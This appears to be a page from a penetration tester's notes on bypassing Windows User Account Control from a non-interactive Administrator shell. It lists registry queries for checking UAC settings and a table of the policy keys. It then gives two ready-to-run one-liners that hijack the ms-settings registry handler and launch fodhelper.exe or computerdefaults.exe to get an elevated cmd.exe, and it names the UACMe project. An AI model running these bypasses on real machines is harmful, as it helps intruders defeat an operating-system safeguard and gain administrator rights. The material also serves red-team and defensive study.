Use this when we have only a shell of an Administrator account and no graphical UI so we cannot click on the “Run as admin” UAC popup. Not exactly a privilege escalation technique, but more like… Some weird quirks of windows.

UAC enabled?#

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

There are more to query, but generally those two are good enough. See the meaning of value return in the table down there. God I hate windows

Group Policy Setting Registry Key Default Setting
User Account Control: Admin Approval Mode for the built-in Administrator account FilterAdministratorToken Disabled
User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop EnableUIADesktopToggle Disabled
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode ConsentPromptBehaviorAdmin Prompt for consent for non-Windows binaries
User Account Control: Behavior of the elevation prompt for standard users ConsentPromptBehaviorUser Prompt for credentials on the secure desktop
User Account Control: Detect application installations and prompt for elevation EnableInstallerDetection Enabled (default for home) Disabled (default for enterprise)
User Account Control: Only elevate executables that are signed and validated ValidateAdminCodeSignatures Disabled
User Account Control: Only elevate UIAccess applications that are installed in secure locations EnableSecureUIAPaths Enabled
User Account Control: Run all administrators in Admin Approval Mode EnableLUA Enabled
User Account Control: Switch to the secure desktop when prompting for elevation PromptOnSecureDesktop Enabled
User Account Control: Virtualize file and registry write failures to per-user locations EnableVirtualization Enabled

Fodhelper#

reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

Computerdefaults#

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe

UACMe#

Github Page

Backward Print Nightmare User Interactions Forward